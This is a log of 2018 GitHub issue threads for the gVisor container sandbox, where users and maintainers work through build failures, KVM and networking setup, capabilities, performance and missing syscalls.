These means I succeed ? Or I cann't use `ps -elf | grep qe

[2018-07-04 04:28] prattmic commented on #84
Our kvm platform doesn't use qemu (or any other traditional vmm). The log you pasted shows the configuration: `Platform: kvm`.

Is there something more specific you are looking for?

[2018-07-04 04:33] zhang2639 commented on #84
@prattmic Thank you.
The configuration: `Platform: kvm` means I succeed to use gvisor in kvm platform？
If so. I don't have any other questions.

[2018-07-04 04:39] prattmic commented on #84
Yup!

[2018-07-04 04:39] #84 closed

[2018-07-04 11:08] mundaym opened #85 "Replace uses of syscall.EPOLLET with unix.EPOLLET"
`syscall.EPOLLET` has incorrectly been generated as a negative number on 386/amd64/arm. Due to the Go 1 guarantee it is frozen and cannot be fixed (https://github.com/golang/go/issues/5328). This leads to workarounds where EPOLLET is negated before it is used. Unfortunately on other platforms it has the correct, positive, value making the negation incorrect.

Can `unix.EPOLLET` be used instead (ht

[2018-07-04 20:31] ydjainopensource commented on #85
syscall.EPOLLET is used at 3 places. However, there is a comment which acknowledges this issue [here](https://github.com/google/gvisor/blob/master/pkg/sentry/syscalls/linux/sys_epoll.go#L83) which makes me question whether the unix pkg was not used on purpose.Can anybody confirm before I send a PR?

I am able to compile if I change it to use unix.

[2018-07-04 22:10] prattmic commented on #85
That comment was written before we used the unix package anywhere in gVisor, which is why it isn't used there. Switching to the unix package is fine.

That said, there is an opportunity for a bit more cleanup here.

TL;DR for below, use the `unix` package [here](https://github.com/google/gvisor/blob/797cda301677abc8523d5a2a8d731312cc43bce4/pkg/waiter/fdnotifier/fdnotifier.go#L73) and the `linux` p

[2018-07-05 12:17] zhang2639 opened #86 "How to use network passthrough？"
`docker version`
[code]
`uname -a`
[code]
Full docker command you ran
[code]

`/etc/docker/daemon.json`
[code]
`create` log
[code]
In log, `Network: host` means I start container successfully. But I use `ifconfig` in container, it failed. See:
[code]
eth0 in host.
[code]
Is it because my network adapter doesn't fit ?
So how to use network passthrough？
Thank you for helping me.

[2018-07-06 11:07] zhang2639 commented on #86
`hostname -I` works.

[2018-07-06 11:07] #86 closed

[2018-07-06 14:08] Kuvesz opened #87 "gvisor not showing up as a runtime"
Hello!

I'm trying to run gvisor under docker, on it's own it works fine, but docker doesn't even notice it's there.
So I'm running the following:
`docker run --runtime=runsc hello-world`
And the result is:
[code]
My Docker version is the latest, so: 18.03.1-ce
I'm running Ubuntu 16.04
I have added the lines needed to /etc/docker/daemon.json
I have done `systemctl restart docker` and `systemctl da

[2018-07-06 15:06] nlacasse commented on #87
This should work.  Maybe there is a syntax error in your daemon.json?

[2018-07-06 15:08] ydjainopensource commented on #87
Did you forget restarting the docker daemon after installation?

[2018-07-06 16:50] Kuvesz commented on #87
Nope and nope, my daemon.json worked just fine up to this point, I even added Kata Runtime in there, than tried this, didn't work, so I deleted Kata Runtime, still does 't work. Oh and yes, I did restart the docker daemon.

[2018-07-09 03:30] zhang2639 commented on #84
I succeed to start container in `kvm` platform before. But I failed in another machine. Something strange errors.
I'm running the following:
[code]
Something strange:
[code]
It seems that I have created the container. But why is `goroutine ` happening?
Then I add  `-d` to start a centos container. The centos container cannot be started and run.

`/etc/docker/daemon.json`:
[code]
`docker info`:
[co

[2018-07-09 06:41] zhang2639 commented on #11
I got some similar problems. #84

[2018-07-09 07:29] Kuvesz commented on #87
UPDATE: I tried it on a 18.04 VM I have and it worked just fine. I'm gonna look into Kata, maybe I didn't remove it properly enough.

[2018-07-09 07:52] Kuvesz commented on #87
I did it. I had to get rid of Kata Containers yes, but not only that, I had to have the runtimes parts starting my daemon.json, which I didn't, because I had some DNS settings and it didn't work that way. Now I'll have to figure out a way to have runc, runsc and kata usable at the same time somehow.

[2018-07-09 07:52] #87 closed

[2018-07-09 09:01] plehdeen commented on #84
Is that a virtual machine, which you have problem with running gvisor(kvm) ?  ( actually, I cannot get the gvisor(kvm platform) work on a nested virtualization)

[2018-07-09 12:54] woody01 opened #88 "postgres needs sync_file_range"
Hello. I'm trying banchmark docker postgres with gvisor by using pgbench. I execute the following commands:
[code]
then start benchmark:
[code]
this test completes successfully, but if I increase the number of transactions and clients:
[code]
test hangs (just stop), apparently waiting for a response from the database.
postgres spam message: `WARNING:  could not flush dirty data: Function not imple

[2018-07-09 21:04] #27 closed

[2018-07-11 01:40] amscanne commented on #11
When the note Go commit is in a runtime release (Go 1.11?), this issue should be resolved for smaller physical address spaces.

[2018-07-11 01:42] amscanne commented on #84
@zhang2639 Can we pull your comment above into a separate issue? I believe it's unrelated but still needs to be looked at.

@plehdeen Can you provide more details? I've tested with nested virtualization in the past.

[2018-07-11 02:01] zhang2639 commented on #84
Thank you for helping me.
@plehdeen  No, I run in a physical machine.
@amscanne Yeah, of course you can.

[2018-07-14 16:06] plehdeen commented on #84
@amscanne , I still can't get gvisor kvm platform work under nested virtualization.

The runsc is nightly-build version (download in 2018-7-14). The docker version is `Docker version 18.03.1-ce, build 9ee9f40`. And I just test it with the `hello-world` docker image. Here's the log I got.

[Log.tar.gz](https://github.com/google/gvisor/files/2195074/Log.tar.gz)

[2018-07-16 23:23] amscanne commented on #84
It looks like initial vCPU entry failed. There must be some feature that the nested hypervisor does not support that is being set unilaterally. I'm not sure what would be triggering it. What is the underlying hypervisor?

KVM trace events might spit out more meaningful information that it's pretty easy to get:
https://www.linux-kvm.org/page/Perf_events

[2018-07-22 12:14] YellyYU opened #89 "bazel build error: unrecognized import path: "golang.org/x/sys""
Hi guys:

I a new-learner of gVisor and was following the README instructions to look into gVisor these days.

Everything goes well when I download the latest nightly build, move it to /usr/local/bin, configuring docker in /etc/docker/daemon.json, and run the command $ docker run --runtime=runsc ...

And the runsc command such as $ runsc run ... also seems normal.

However, when I sought to compil

[2018-07-23 03:31] prattmic commented on #89
Hm, it should "just work". Could you include the entire output from bazel build?

[2018-07-23 14:37] fvoznika commented on #37
It does support `docker exec`, but it doesn't support it when `-ti` option is used.

[2018-07-24 03:20] chenggangqcg opened #90 "Cannot kill process by Ctrl+C in CentOS image"
I cannot kill a process by Ctrl+C in CentOS image.
`docker run --runtime=runsc -it centos`
`# yes`
Then Ctrl+C will kill nothing.
The version of CentOS image is：7.5.1804
The platform mode is KVM

[2018-07-24 04:20] chenggangqcg opened #91 "missing: /sys/devices/system/cpu/possible"
While run 'lscpu', we got this error:
lscpu: failed to determine number of CPUs: /sys/devices/system/cpu/possible: No such file or directory

[2018-07-24 09:01] cilto opened #92 "Can gvisor container enable IPC with host?"
Hi, does gvisor have any option to enable IPC with host?
For example, runc has option like '--ipc=host' to share IPC name space with host.

I tried to do that in runsc with below options, but it did not work.
/dev/shm was not shared with host in containers.

**Settings:**

In  /etc/docker/daemon.json:
- --file-access=direct
- --overlay=true

Executed command to launch container:

- docker run --ru

[2018-07-24 11:56] YellyYU commented on #89
@prattmic first thank you for your prompt reply!

Specifically I run $ bazel build runsc in gvisor directory, the outputs are as follows:

WARNING: ignoring http_proxy in environment.
Starting local Bazel server and connecting to it...
.........
ERROR:  /home/yelly/gvisor/runsc/cmd/BUILD:5:1: no such package '@org_golang_x_sys//unix': failed to fetch org_golang_x_sys: 2018/07/24 19:07:06 unrecogni

[2018-07-24 13:03] newmanwang commented on #89
Got the same error by following "Installing from Source" in project README.md

[2018-07-24 13:59] newmanwang commented on #89
The problem is gone by setting HTTP_PROXY and HTTPS_PROXY environment before run bazel build.

[2018-07-24 23:52] wuqixuan commented on #89
@newmanwang   Would you tell me how and what did you set for HTTP_PROXY and HTTPS_PROXY ?

[2018-07-25 02:12] newmanwang commented on #89
Make HTTP_PROXY and HTTPS_PROXY point to a proxy that beat the greate firewall wall, e.g HTTPS_PROXY=192.168.16.1:1080

[2018-07-25 02:32] newmanwang commented on #89
@prattmic Try HTTPS_PROXY/HTTP_PROXY instead of https_proxy/http_proxy

[2018-07-25 17:13] kevinGC commented on #92
We don't support a host IPC option. I think that gVisor, by its nature, wants to prevent sandboxed processes from communicating with the host directly via shared memory. I would recommend using another method (e.g. networking) to communicate between processes on the host and in gVisor.

[2018-07-30 20:09] salrashid123 opened #93 "dotnet works under runsc"
Verified dotnet coreclr also workes under runsc.

the following is a minimal app that was verified under runsc.

[code]

I'll verify a larger full web framework and update here so we can also list it under README

[2018-07-31 05:58] amscanne commented on #20
Sorry, somehow I think this issue went unnoticed!

Q1: For the KVM platform, only host user space spaces are available to the guest, so Meltdown would not apply. For ptrace, yes, you still have the upper half (but you also now have KPTI).

Q2: I'm sure it's theoretically possible. Not sure how easy or practical. Applies the same way to different VMs on the same host. (If you can probe cache timing

[2018-07-31 05:58] #20 closed

[2018-07-31 06:00] amscanne commented on #41
This should have been fixed by c7d7312d6d86843d3c9b68abc2299ffb5d4840ba.

[2018-07-31 06:00] #41 closed

[2018-08-02 09:01] YvesChan opened #94 "iproute 'ip addr' does not work"
- docker version: 18.03.1-ce
- kernel: 4.9.75
- command using in runsc: `/sbin/ip`  from iproute-3.10.0
- full docker command:
  * docker run -it --runtime=runsc ubuntu bash
  * (in container) apt update && apt-get install iproute2
  * (in container) ip addr
    * stdout shows: "SO_SNDBUF: Protocol not available"
- misc: This can be reproduced in centos7 also.
- runsc debug/strace log:
[code]

run

[2018-08-02 09:39] YvesChan commented on #94
Fine... seems I got the answer

[code]

[2018-08-02 20:31] prattmic commented on #94
Making iproute's `ip` work is one our roadmap.

FWIW, Alpine's should already work:

[code]

[2018-08-03 08:07] YvesChan opened #95 "docker run hang"
### Description of problem
`dockr run` with runsc leads to process hang in some situations (while the target command did NOT exist in container)

### Environment
* OS: CentOS 7
* docker: 18.03.1-ce
* kernel: 4.9.75

### Steps to Reproduce
1. docker run --runtime=runsc --rm -it alpine bash (100% reproduced)
2. docker run --rm -it alpine bash   // runc return correctly
docker: Error response from da

[2018-08-03 08:11] YvesChan commented on #94
@prattmic Thanks for the feedback. I have tried your suggested images, it did work. But I found another problem immediately. :(  #95

[2018-08-03 08:44] newmanwang commented on #95
There is no bash in alpine, try docker run --runtime=runsc --rm -it alpine sh

[2018-08-03 08:49] YvesChan commented on #95
@newmanwang I know, but process should NOT hang while command not found.

[2018-08-03 12:27] newmanwang commented on #95
I can not reproduce,   `docker run  --runtime=runsc --rm -it alpine bash` output:

`docker: Error response from daemon: OCI runtime start failed: /data/opt/docker/runtimes/runsc did not terminate sucessfully: error starting container: error starting root container [bash]: failed to create init process: no such file or directory
: unknown.
ERRO[0001] error waiting for container: context canceled `

[2018-08-06 03:13] YvesChan commented on #95
Have you checked the container list status via `docker ps -a` ?  No "Created" status container found?

[2018-08-07 00:19] fvoznika commented on #95
There is a bit of a race condition trying to send the error message back to `docker run` from within the sandbox before the sandbox process exits and closes the communication channel. The code works pretty reliably without `-it`, but I've also noticed that it hangs with `-it` on the same command. I haven't had a chance to debug it yet though.

[2018-08-09 16:34] #94 closed

[2018-08-10 22:27] nlacasse commented on #44
This should be fixed now.

[2018-08-10 22:32] #44 closed

[2018-08-14 18:30] nlacasse commented on #80
We now have experimental support for checkpoint/restore, although it does not work with Docker yet.

Please see the documentation for how to use checkpoint/restore in runsc:
https://gvisor.googlesource.com/gvisor/+/master/g3doc/checkpoint_restore.md

[2018-08-14 18:30] #80 closed

[2018-08-17 02:04] YellyYU commented on #89
This problem is gone after I pulled the latest source code and rebuild...

[2018-08-17 02:04] #89 closed

[2018-08-17 03:51] YellyYU opened #97 "cannot connect to host from gVisor container created and run by `runsc --network=host run ...`"
I have a simple scenario that requires communication between container and the host.
I configured runsc in /etc/docker/daemon.json as follows:
'{
    "runtimes": {
        "runsc": {
            "path": "/usr/local/bin/runsc",
            "runtimeArgs": [
                "--platform=kvm",
                "--network=host"
            ]
        }
    }
}'

I created and run the gVisor container by c

[2018-08-18 00:34] nlacasse commented on #91
Fixed in aeec7a4

[2018-08-18 00:34] #91 closed

[2018-08-22 05:18] fvoznika commented on #88
Thanks for the detailed report, Postgres is calling `sync_file_range` which is [not implemented yet](https://github.com/google/gvisor/blob/6cf22781673d75cca459fd668cf291b387d52e0d/pkg/sentry/syscalls/linux/linux64.go#L324).

[2018-08-23 04:40] #92 closed

[2018-08-23 05:08] fvoznika commented on #97
If you run with [debug flags](https://github.com/google/gvisor#debugging), the `*.boot` log file will have messages regarding network configuration. It's likely related with permissions to discover the interfaces. Check that you have capabilities specified in the spec, otherwise the sandbox will be stripped of all capabilities when it runs.

If you need extra logging to find what's happening, [her

[2018-08-23 05:10] #83 closed

[2018-08-23 05:12] #81 closed

[2018-08-23 05:14] fvoznika commented on #79
@ydjainopensource is not working on it anymore :-(
Please reopen if there is interest from anyone else.

[2018-08-23 05:14] #79 closed

[2018-08-23 05:17] fvoznika commented on #95
Duplicate of #77

[2018-08-23 05:17] #95 closed

[2018-08-23 05:17] fvoznika commented on #77
There is a bit of a race condition trying to send the error message back to docker run from within the sandbox before the sandbox process exits and closes the communication channel. The code works pretty reliably without -it, but I've also noticed that it hangs with -it on the same command. I haven't had a chance to debug it yet though.

[2018-08-23 05:29] fvoznika commented on #7
Closing old bugs. Please reopen if you'd like to continue the discussion.

[2018-08-23 05:29] #7 closed

[2018-08-23 05:37] fvoznika commented on #31
The issue with pre-fetching dependencies is being resolved in bazelbuild/bazel#5175.

Every build system has its pros and cons. I know that bazel is not widely adopted, but it fits pretty well with our project, considering we use it with the internal version of bazel.

[2018-08-23 05:37] #31 closed

[2018-08-23 08:43] YvesChan opened #98 "implementation of TCP/UDP connection info in procfs"
While using netstack in gvisor, there's no content in `/proc/net/{tcp,udp}` file.  So all commands (e.g. ss) rely on these procfs files won't work until they are implemented in netstack.

Is there any plan for supporting this feature? Thanks

[2018-08-27 20:38] fvoznika commented on #98
Yes, we're focusing on tool support and should start closing the gaps on this front. Patches are also very welcome! :-)

[2018-08-29 22:40] fvoznika commented on #37
Fixed by 106de2182d34197d76fb68863cd4a102ebac2dbb

[2018-08-29 22:40] #37 closed

[2018-09-01 06:51] YvesChan opened #99 "file permission problem while using file-access=direct"
Is file-access an experimental option of daemon.json in gvisor?  I found this option in code, but not in documentations.
When I try to use file-access=direct to bypass gofer, the official nginx image cannot work properly. It seems like the file relative syscalls fail due to `Operation not permitted`.

### problem details

$ docker run -d --runtime=runsc --rm nginx   // container fail to bootup

tr

[2018-09-02 14:38] YellyYU commented on #97
@fvoznika Thank you for your kind advice.

I have
`
    ...
    "process": {
        ....
        "capabilities": {
            "bounding": [
                "CAP_AUDIT_WRITE",
                "CAP_KILL",
                "CAP_NET_BIND_SERVICE",
                "CAP_NET_RAW"
            ],
            "effective": [
                "CAP_AUDIT_WRITE",
                "CAP_KILL",
                "CAP

[2018-09-06 15:19] fvoznika commented on #99
Yes, `file-access=direct` is only experimental and we're about to remove it from the code.

[2018-09-06 15:19] #99 closed

[2018-09-07 00:44] YellyYU commented on #97
@fvoznika So far I run every `runsc` command using `sudo`, but the problem still occurs to me...

[2018-09-07 09:20] YvesChan commented on #99
@fvoznika So is it impossible for user to bypass gofer for performance purpose?

[2018-09-07 16:38] amscanne commented on #99
Is this performance purely in the context of nginx?

[2018-09-08 00:00] #54 closed

[2018-09-08 02:29] YvesChan commented on #99
@amscanne Nginx is one of our benchmark model.

[2018-09-10 16:30] fvoznika commented on #99
Bypassing the gofer requires the sandbox to run with less strict security. Many of the things we do to limit what a compromised sandbox could do to the host are incompatible with `--file-access=direct`. The sandbox would need to join the user namespace and apply the same capabilities (at least for the FS related ones, like CAP_FOWNER). In addition, the seccomp profile applied to the sandbox would

[2018-09-10 16:36] fvoznika commented on #99
For nginx benchmarks specifically, the gofer is called to walk directories and open files. Once the file is open, the sandbox reads and writes directly to/from files (i.e. the gofer is not involved). Assuming that your workload is not constantly opening new files, the performance of `--file-access=direct` and `--file-access=exclusive` should be similar.

[2018-09-10 17:16] fvoznika commented on #97
You need to find out why `runsc boot` is running with capabilities stripped. You can take a look at the process hierarchy and see where the capabilities drop (`/proc/<pid>/status | grep Cap`). You may also print all capabilities (in [main.go](https://github.com/google/gvisor/blob/master/runsc/main.go)) when `runsc` starts to see capabilities of short lived commands, like run/create/start.

[2018-09-12 22:50] fishy opened #100 "Failed to run because of no docker log file"
Other useful information to include is:
- `docker version` or `docker info` if more relevant
`Docker version 18.06.1-ce, build e68fc7a`
- `uname -a`
`Linux gvisor 3.13.0-129-generic #178-Ubuntu SMP Fri Aug 11 12:48:20 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux`
- `git describe`
[code]
- Full docker command you ran
[code]

This is `Dockerfile` for the `optipng` image:
[code]

If I downgrade docker to

[2018-09-12 22:50] fishy commented on #100
Also there's no gViso log generated.

[2018-09-13 02:59] YellyYU opened #101 "failed to generate root mount point: broken pipe"
I noticed that there've been many modifications on this project over the past month, so I pulled the latest version and tried it out. However I could even boot up my container with the log says:

I used runsc command directly: `sudo runsc run mycontainer_hello`

the spec file I used  is as follows:
{
	"ociVersion": "1.0.0",
	"process": {
		"terminal": true,
		"user": {
			"uid": 0,
			"gid": 0
		}

[2018-09-13 03:31] YellyYU commented on #97
@fvoznika

I checked /proc/<pid>/status with the pid of two processes, one runs main.go, and the other runs the sandbox.

For the one runs main.go, the Cap related fields are:

For the one runs the sandbox, the Cap related fields are:

I guest the reason why CapPrm and CapEff fields are all zero is that the inheritable set(as CapInh field suggests) of the previous process is all zero.

However, as

[2018-09-13 03:58] YellyYU commented on #97
@fvoznika Also I found that if I execute `runsc run` commands without `--network=host` argument, I will not get the

like log info.

So I tried to live without that argument and configure the network on my own (I guess this is actually the recommended way because --network=host is not safe enough?).

I cannot find much instruction on configuring network for gVisor, so I referred to a blog instruct

[2018-09-13 09:11] yanghaichao12 opened #102 "some performance comparison between docker and gvisor"
i make some performance testing about network and I/O,and that's result:
the bandwidth of docker(by iperf):
![image](https://user-images.githubusercontent.com/20693362/45478713-1cfaf480-b777-11e8-8718-76897e7fe118.png)
the bandwidth of gvisor:
![image](https://user-images.githubusercontent.com/20693362/45478843-7531f680-b777-11e8-9115-8c802eb0419a.png)
the i/o performance of docker:
![image](https

[2018-09-13 19:46] matti opened #103 "runsc without docker"
It looks like there are no official docs on how to run gvisor without docker - I found this https://medium.com/@remco_verhoef/sandboxing-with-gvisor-b9979bd424b9 - but I couldn't get the ip.sh stuff working.

I can not test save/restore (#80) without this, see https://gvisor.googlesource.com/gvisor/+/master/g3doc/checkpoint_restore.md for docker incompatibility notes

[2018-09-13 19:48] matti commented on #80
@nlacasse opened #103 because I have no idea how could I test this without that.

[2018-09-13 20:12] iangudger commented on #103
What problem did you have with ip.sh?

[2018-09-13 20:15] matti commented on #103
@iangudger some errors - didnt bother to try again - I really think there should be official docs on this subject

[2018-09-14 06:08] newmanwang commented on #38
Seems like gvisor queued pointer of struct SignalInfo with signo set to SIGSEGV into task's pending signal queue, but value of this SignalInfo was modified concurrently by sentry before delivered to task.  I think gvisor should queue value of struct SignalInfo instead. I am fixing it

[2018-09-14 16:33] fvoznika commented on #101
This error comes when the sandbox is trying to contact the gofer process to mount rootfs. `broken pipe` indicates that the gofer process exited with an error. The gofer logs will have more clues about what failed.

[2018-09-16 22:28] prattmic commented on #100
gVisor requires at least Linux 3.17 to run: https://github.com/google/gvisor#installation

[2018-09-16 23:34] fvoznika commented on #102
**Network:** Can you provide more information about your setup? I suspect you're running the server inside the container and the client outside in the same machine? If that is the case, docker runs your container as regular processes and they will use the loopback within the same machine. gVisor virtualizes the network and cannot use the loopback in the same way. Though client and server are norma

[2018-09-16 23:36] #100 closed

[2018-09-18 02:13] yanghaichao12 commented on #102
@fvoznika hi，i tested network again.this time,i set client and server in different physical machine, and get very close transfer speed.
docker
![image](https://user-images.githubusercontent.com/20693362/45660199-2fd04900-bb2a-11e8-848e-18553b19bb60.png)
gVisor
![image](https://user-images.githubusercontent.com/20693362/45660264-7c1b8900-bb2a-11e8-98d8-79e0b1ac0d13.png)
i think this speed limitatio

[2018-09-18 06:51] YvesChan opened #104 "Should we use a fixed MemTotal value instead of dynamic one in meminfo?"
The default value of MemTotal in /proc/meminfo is 2G, and it'll scale up when the processes is using up all the memory. But in some situations when the process initialize with the current meminfo data, and it cannot sense the change in memory.
So why not using a fixed value passed in by the host(--memory or MemTotal in host as default) instead of dynamic value?

[2018-09-18 11:53] yanghaichao12 commented on #102
@fvoznika ok, i'll do more testing,thx

[2018-09-18 17:06] prattmic commented on #104
There is no perfect solution. gVisor does not have a fixed memory limit, it can scale just like a normal process. We could report the maximum memory on the system (or the memcg limit, if applicable), but in the past we've found some applications that will use extra memory when they see more available from the host, so reporting a lower number can be advantageous to keep usage lower. This is basica

[2018-09-19 02:33] YvesChan commented on #104
Is it possible for the latest version of gVisor? I think the --memory option is ignored when runsc bootup.

Yes but I raised this issue not only for performance purpose. Actually our Java application(Tomcat) could not bootup because of the Memtotal did NOT scale up automatically while loading tons of jar, and it failed with OOM. So we thought in such circumstance, maybe it's better to **provide th

[2018-09-19 04:29] fvoznika commented on #104
Correct, the --memory option is ignored right now, but we'd like to support it. Setting `/proc/meminfo:MemTotal` to `--memory` value is a good idea. A patch with the change is highly appreciated.

[2018-09-19 16:54] prattmic commented on #104
I agree, we should provide more control over this. I simply meant the explain the reasoning for the existing behavior above.

[2018-09-19 22:09] rainfld opened #105 "Errors While building from Source"
I'm trying to build gVisor from source using bazel. However, by typing "bazel build runsc", I got following error messages:

ERROR: ~/.cache/bazel/_bazel_llei1/7ebbd2b82372340cc34333219aebd7b3/external/io_bazel_rules_go/go/private/rules/sdk.bzl:37:10: **unexpected keyword 'provides' in call to rule**(implementation: function, test: bool = False, attrs: dict or NoneType = None, outputs: dict or dic

[2018-09-19 22:14] prattmic commented on #105
I suspect your version of Bazel is too old. Can you try the latest [release](https://github.com/bazelbuild/bazel/releases)?

[2018-09-21 16:53] rainfld commented on #105
That works! Thanks a lot @prattmic

[2018-09-21 16:55] #105 closed

[2018-09-22 07:55] newmanwang opened #106 "Test case failure: kvm_test failure"
Sorry for disturbing, I' m trying to run gVisor test suite with bazel test..., but failed on kvm_test case.
I get following logs:

[code]

----
Information might help:
docker info:
Containers: 127
 Running: 0
 Paused: 0
 Stopped: 127
Images: 167
Server Version: 17.12.0-ce
Storage Driver: overlay2
 Backing Filesystem: extfs
 Supports d_type: true
 Native Overlay Diff: true
Logging Driver: json-file

[2018-09-22 20:15] matti commented on #103
I don't understand why this project is so secretive - why can't you document how to use runsc?

[2018-09-23 12:37] hugelgupf commented on #103
runsc implements the OCI runtime spec. Any guide you can find online on how to use runc standalone should somewhat apply to runsc as well - if you combine those guides with the information in our README, you should be able to figure out pretty quickly.

The code is all there - no secrets. I speculate lack of time leads to lack of documentation, and the short answers we've been giving.

[2018-09-23 14:49] nl5887 commented on #103
@matti could you send me an email at remco@dutchcoders.io? I'll be happy to help you out, with this issue, and update the documentation accordingly.

[2018-09-24 17:01] prattmic commented on #106
Could you post one of the complete processor blocks from `/proc/cpuinfo` (for processor model, etc)?

Is this using nested virtualization? i.e., are you running bazel test inside a VM?

KVM tracepoints may help diagnose this. To collect, run `sudo perf record -a -e "kvm:*"`, then `bazel test //pkg/sentry/platform/kvm:kvm_test` while perf is running. Then kill perf and post the output of `perf scri

[2018-09-25 15:01] newmanwang commented on #106
Thank you for your reply!  I did the test in bare metal not a vm.

## /proc/cpuinfo:
[code]

## perf script output
[code]

[2018-09-25 16:31] YvesChan opened #107 "Will gVisor implement the cgroup setting related feature?"
The current version of gvisor have NOT implemented setting the host cgroup like runc does. Is it better to integrate the cgroup related functions into the runsc? Or using an independent tools to set the cgroup outside?

[2018-09-26 16:58] fvoznika commented on #107
We will soon start working on this. The plan is to integrate cgroup related functions into runsc. runsc will setup cgroup on the host and run the sandbox inside it. For multi-container, the cgroup setting will be the aggregation of all containers running inside the sandbox.

[2018-09-27 10:03] #102 closed

[2018-09-28 18:00] #5 closed

[2018-10-09 06:45] ianlewis commented on #103
@matti For the record, I think it's valid to have a doc on running it directly with runsc. I'll work on something in the next couple days.

[2018-10-09 13:32] ianlewis commented on #11
@evanphx @iwankgb @ultimoguerrero @zhang2639 Since Go 1.11 is out can one of you verify that it's fixed for you?

[2018-10-09 13:33] ianlewis commented on #93
@salrashid123 Feel free to submit the CL yourself!

[2018-10-09 16:50] salrashid123 commented on #93
while the baseline donet helloworld worked, the baseic default MVC app didn't until recently.

[code]

[code]

[code]

[code]

i don't mind adding in a PR to cite dotnet but whats the criteria to say 'its tested'
 - https://github.com/google/gvisor#what-works

are we running the actual language or app unittests within a gvisor container
- https://github.com/dotnet/coreclr/blob/master/Documentation

[2018-10-09 21:13] #38 closed

[2018-10-10 07:40] matti commented on #103
@ianlewis thank you!

[2018-10-10 07:40] matti commented on #103
@nl5887 I did send you an email

[2018-10-10 09:47] lubinsz commented on #63
@prattmic We have enabled ptrace platform on Arm64 platform. Later, we will deliver the patches.
Please see following as reference:
######
root@entos1:/go/src/github.com/google/gvisor# uname -p
aarch64
root@entos1:/go/src/github.com/google/gvisor# docker run --runtime=runsc hello-world
W1010 17:46:16.510561   30359 x:0] Could not parse /proc/cpuinfo, it is empty or does not contain cpu MHz
W1010 1

[2018-10-10 16:35] prattmic commented on #63
Wow, that's great! I didn't realize anyone was working on this. I look forward to seeing the changes.

[2018-10-10 17:18] amscanne commented on #63
Amazing! Is there a public branch somewhere on github? We'd love to help the patches land, and it might be useful to have some early high-level guidance.

[2018-10-11 01:17] ianlewis opened #109 "Docs refactor"
The current README is great and has a lot of info but it doesn't really scale well and it's unclear where to add additional docs. I would like to refactor it into some docs pages that can be expanded in the future.

Currently there is just a README and some files in the g3docs directory.

Some options:
1. Markdown in the docs/ directory.
2. Use a docs generation tool like [gitbook](https://www.git

[2018-10-11 20:16] fvoznika commented on #107
cgroup setting implemented in 29cd05a7c66ee8061c0e5cf8e94c4e507dcf33e0

[2018-10-11 20:16] #107 closed

[2018-10-11 20:46] kevinGC commented on #109
I don't know about gitbook specifically, but I like having all the docs together in a coherent format like that. Regarding suggestion 3, I would prefer not to split docs into a separate repo.

[2018-10-12 06:11] HazCod opened #110 "Postfix support?"
Hello,

did anyone try postfix under gvisor?
Since postfix requires root access, this would make a fine candidate to shield off the kernel from.

Also, am I correc to state that the purpose of gvisor is to shield off the kernel implementation using the golang vm?

[2018-10-14 14:54] HazCod commented on #110
See https://security.stackexchange.com/questions/71922/postfix-master-running-as-root

[2018-10-22 07:18] chenggangqcg opened #111 "bazel build runsc failed recently"
From last week, we get error while building runsc:

ERROR: error loading package '': Extension file not found. Unable to load package for '@bazel_tools//tools/build_defs/cc:action_names.bzl': BUILD file not found on package path

[2018-10-27 06:43] matti commented on #103
@ianlewis did you have a chance to work on this?

[2018-10-30 14:46] CodeJuan opened #112 "unsupported mode value: 'mode=755'"
I generated a spec by https://github.com/containerd/containerd/blob/master/oci/spec.go#L48, and got an error `failed to create mount with source \"xxxxx/tmpfs\": unsupported mode value: 'mode=755'` when starting gVisor container. I think it was caused by https://github.com/containerd/containerd/blob/master/oci/spec.go#L206, the `mode=755` didn't match the pattern `modeRegexp = regexp.MustCompile("

[2018-10-30 17:07] fvoznika commented on #112
You're right, our regex is too restrictive. Yes, please send a PR with the fix.

[2018-10-30 17:51] fvoznika commented on #112
Just to clarify, gVisor doesn't access git pull requests. We use Guerrit instead, please take a look at the instructions [here](https://github.com/google/gvisor/blob/master/CONTRIBUTING.md).

[2018-11-01 18:58] #112 closed

[2018-11-05 12:01] erulabs opened #113 "Checkpointing a running container with active tcp connections"
Hello!

  Love gvisor, thank you for your work so far! I'm using checkpoints in a situation where I don't want or need TCP connections to be check-pointed. Using runc and criu (https://github.com/checkpoint-restore/criu), I can make a modification to criu which simply skips accounting for TCP handles entirely. Unfortunately with gvisor I get an error from netstack:

[code]

I'll work on a smaller

[2018-11-05 17:44] zhaozhongn commented on #113
Hi Seandon,

I assume by "don't want or need TCP connections to be check-pointed" you meant any active TCP connections upon checkpoint can be safely dropped in the background. In that case, yes, it should be as simple as making stack.CapabilityDisconnectOk true (while keeping stack.CapabilitySaveRestore false) for all NICs with active TCP connections.

We do plan to expose these options to the run

[2018-11-14 00:51] fvoznika commented on #6
SOCK_RAW has a large surface, so we're looking if it's possible to implement a smaller set to support tools like ping and tcpdump. What ping version are you using `ping -V`?

[2018-11-14 09:41] tpanum commented on #6
We are maintaining [CTF Platform](https://en.wikipedia.org/wiki/Capture_the_flag#Computer_security), and use Docker for our challenges. However, we are looking for a Docker runtime that can prevent participants to suddenly from performing a kernel exploit that would take down the entire host.

In our use case, we rely on some fairly complex networking tools (e.g. `nmap`), which I believe on a broa

[2018-11-14 17:31] iangudger commented on #6
Can you provide a list of tools you would like to see supported? As fvoznika said, we probably won't implement every SOCK_RAW feature, but if you give us a list of tools, we can look into what would be required to support them.

[2018-11-14 21:01] fvoznika commented on #88
Resolved by 2ef122da35899591737adca296b499246b877532

[2018-11-14 21:01] #88 closed

[2018-11-15 07:45] hazcod opened #114 "Versioning?"
Hello,

Are there any plans/estimates on releasing a gvisor release?
I'm curious to see what commit the guys @ google use.

I would like to start playing around, but I don't want to pick the latest nightly just 'because'.

[2018-11-19 09:06] ianlewis commented on #114
Hi, we update the version we use at Google pretty often so it wouldn't be all that useful to tell you what version we are using.

We have been updating often to support for containerd and Kubernetes and some things are still in flux. I think we'll start cutting releases on github after support for those is more stable but we're still discussing how to do releases at the moment.

For now, you can u

[2018-11-20 17:18] boostpaal opened #115 "DNS not working in Docker Compose"
DNS lookups fail in Docker Compose 2.3.

*docker-compose.yml*

[code]

*test.js*

[code]

Error:
[code]

[code]

[code]

I've tried using the `use-vc` and other resolve options in Compose (http://man7.org/linux/man-pages/man5/resolv.conf.5.html)  to force TCP over UDP, with no luck:

[code]

[2018-11-20 18:54] boostpaal commented on #115
Needs more testing.

[2018-11-21 07:42] ranchochen commented on #109
Hi, markdown like guide is cool.

[2018-11-22 03:38] praveensastry commented on #75
